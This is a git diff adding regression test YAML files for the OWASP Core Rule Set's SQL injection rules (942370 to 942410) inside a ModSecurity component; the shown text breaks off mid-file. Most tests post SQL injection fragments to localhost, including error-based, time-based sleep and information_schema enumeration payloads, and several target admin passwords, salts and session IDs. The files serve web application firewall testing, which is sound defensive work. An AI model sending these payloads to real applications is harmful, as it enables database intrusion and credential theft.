diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
new file mode 100644
index 000000000..de2866b44
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942370.yaml
+tests:
+ - test_title: 942370-1
+ desc: "classic SQL injection probings 2/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=\"` * 12344"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942370"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
new file mode 100644
index 000000000..da6e2ee6a
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml
@@ -0,0 +1,667 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost 
+ method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 
+ output: + log_contains: id "942380" + - test_title: 942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 
942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: 
"pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942380"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
new file mode 100644
index 000000000..41aeca8b6
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942390.yaml
+tests:
+ - test_title: 942390-1
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=sdfsd%27or%201%20%3e%201"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942390"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
new file mode 100644
index 000000000..b70bddad2
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
@@ -0,0 +1,22 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942400.yaml
+tests:
+ - test_title: 942400-1
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ # variable name boundary attacks
+ data: "and '5'orig_var_datavarname=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942400"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
new file mode 100644
index 000000000..d708bf10d
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
@@ -0,0 +1,1777 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942410.yaml +tests: + - test_title: 942410-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + method: POST + port: 80 + uri: "/" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-24 + desc: "SQL Injection Attack" + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=floor%28" + version: HTTP/1.0 + output: + 
log_contains: id "942410" + - test_title: 942410-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + 
uri: "/" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-45 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 
